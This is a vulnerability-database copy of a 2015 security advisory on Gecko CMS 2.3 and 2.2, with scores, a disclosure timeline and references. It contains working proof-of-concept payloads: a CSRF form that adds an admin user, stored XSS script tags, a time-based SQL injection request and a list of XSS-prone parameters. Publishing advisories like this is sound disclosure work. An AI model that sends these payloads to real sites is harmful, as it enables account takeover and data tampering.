6.8 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
7.1 High
AI Score
Confidence
High
0.011 Low
EPSS
Percentile
84.6%
Title: Gecko CMS 2.3 Multiple Vulnerabilities
Advisory ID: ZSL-2015-5222
Type: Local/Remote
Impact: Cross-Site Scripting, Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data
Risk: (3/5)
Release Date: 12.01.2015
Gecko CMS is the way to go, forget complicated, bloated and slow content management systems, Gecko CMS has been build to be intuitive, easy to use, extendable to almost anything, running on all standard web hosting (PHP and one MySQL database, Apache is a plus), browser compatibility and fast, super fast!
Gecko CMS suffers from multiple vulnerabilities including Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting and SQL Injection.
JAKWEB - <http://www.cmsgecko.com>
2.3 and 2.2
Apache/2
PHP/5.4.36
[27.12.2014] Vulnerabilities discovered.
[05.01.2015] Vendor contacted.
[06.01.2015] Vendor responds asking more details.
[06.01.2015] Sent details to the vendor.
[06.01.2015] Vendor confirms issues but is not going to develop a fix because the issues are present in the admin panel (authd).
[12.01.2015] Public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <http://www.exploit-db.com/exploits/35767/>
[2] <http://packetstormsecurity.com/files/129929>
[3] <http://cxsecurity.com/issue/WLB-2015010058>
[4] <http://osvdb.org/show/osvdb/116966>
[5] <http://osvdb.org/show/osvdb/116967>
[6] <http://osvdb.org/show/osvdb/116968>
[7] <http://osvdb.org/show/osvdb/116969>
[8] <http://osvdb.org/show/osvdb/116970>
[9] <http://www.securityfocus.com/bid/72085>
[10] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1422>
[11] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1423>
[12] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1424>
[13] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1422>
[14] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1423>
[15] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1424>
[16] <http://xforce.iss.net/xforce/xfdb/99974>
[17] <http://xforce.iss.net/xforce/xfdb/99975>
[18] <http://xforce.iss.net/xforce/xfdb/99976>
[19] <http://xforce.iss.net/xforce/xfdb/99977>
[12.01.2015] - Initial release
[14.01.2015] - Added reference [1], [2], [3], [4], [5], [6], [7] and [8]
[23.01.2015] - Added reference [9]
[30.01.2015] - Added reference [10], [11], [12], [13], [14], [15], [16], [17], [18] and [19]
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>Gecko CMS 2.3 Multiple Vulnerabilities
Vendor: JAKWEB
Product web page: http://www.cmsgecko.com
Affected version: 2.3 and 2.2
Summary: Gecko CMS is the way to go, forget complicated, bloated
and slow content management systems, Gecko CMS has been build to
be intuitive, easy to use, extendable to almost anything, running
on all standard web hosting (PHP and one MySQL database, Apache is
a plus), browser compatibility and fast, super fast!
Desc: Gecko CMS suffers from multiple vulnerabilities including
Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting
and SQL Injection.
Tested on: Apache/2
PHP/5.4.36
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5222
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5222.php
27.12.2014
---
CSRF Add Admin:
===============
</p>
<form action="http://demo.cmsgecko.com/admin/index.php?p=user&sp=newuser" method="POST">
<input name="jak_name" type="hidden" value="Testingus2"/>
<input name="jak_email" type="hidden" value="[email protected]"/>
<input name="jak_username" type="hidden" value="Testusername2"/>
<input name="jak_usergroup" type="hidden" value="3"/>
<input name="jak_access" type="hidden" value="1"/>
<input name="jak_password" type="hidden" value="123123"/>
<input name="jak_confirm_password" type="hidden" value="123123"/>
<input name="save" type="hidden" value=""/>
<input type="submit" value="Submit form"/>
</form>
usergroup 4 = moderator
3 = administrator
2 = member standard
1 = guest
5 = banned
Stored XSS (params: jak_img, jak_name, jak_url):
================================================
POST http://demo.cmsgecko.com/admin/index.php?p=categories&sp=newcat HTTP/1.1
jak_catparent 0
jak_catparent2 0
jak_footer 1
jak_img "><script>alert(1);</script>
jak_lcontent <p>test</p>
jak_lcontent2
jak_menu 1
jak_name "><script>alert(2);</script>
jak_name2
jak_url "><script>alert(3);</script>
jak_varname ZSL
save
SQL Injection (params: jak_delete_log[], ssp):
==============================================
POST /admin/index.php?p=logs&sp=s HTTP/1.1
delete=&jak_delete_log%5B%5D=4%20and%20benchmark(20000000%2csha1(1))--%20&jak_delete_log%5B%5D=2&jak_delete_log%5B%5D=1
--
GET /admin/index.php?p=logs&sp=delete&ssp=3[SQLi] HTTP/1.1
Reflected XSS:
==============
/admin/index.php [horder%5B%5D parameter]
/admin/index.php [jak_catid parameter]
/admin/index.php [jak_content parameter]
/admin/index.php [jak_css parameter]
/admin/index.php [jak_delete_log%5B%5D parameter]
/admin/index.php [jak_email parameter]
/admin/index.php [jak_extfile parameter]
/admin/index.php [jak_file parameter]
/admin/index.php [jak_hookshow%5B%5D parameter]
/admin/index.php [jak_img parameter]
/admin/index.php [jak_javascript parameter]
/admin/index.php [jak_lcontent parameter]
/admin/index.php [jak_name parameter]
/admin/index.php [jak_password parameter]
/admin/index.php [jak_showcontact parameter]
/admin/index.php [jak_tags parameter]
/admin/index.php [jak_title parameter]
/admin/index.php [jak_url parameter]
/admin/index.php [jak_username parameter]
/admin/index.php [real_hook_id%5B%5D parameter]
/admin/index.php [sp parameter]
/admin/index.php [sreal_plugin_id%5B%5D parameter]
/admin/index.php [ssp parameter]
/admin/index.php [sssp parameter]
/js/editor/plugins/filemanager/dialog.php [editor parameter]
/js/editor/plugins/filemanager/dialog.php [field_id parameter]
/js/editor/plugins/filemanager/dialog.php [fldr parameter]
/js/editor/plugins/filemanager/dialog.php [lang parameter]
/js/editor/plugins/filemanager/dialog.php [popup parameter]
/js/editor/plugins/filemanager/dialog.php [subfolder parameter]
/js/editor/plugins/filemanager/dialog.php [type parameter]
</body></html>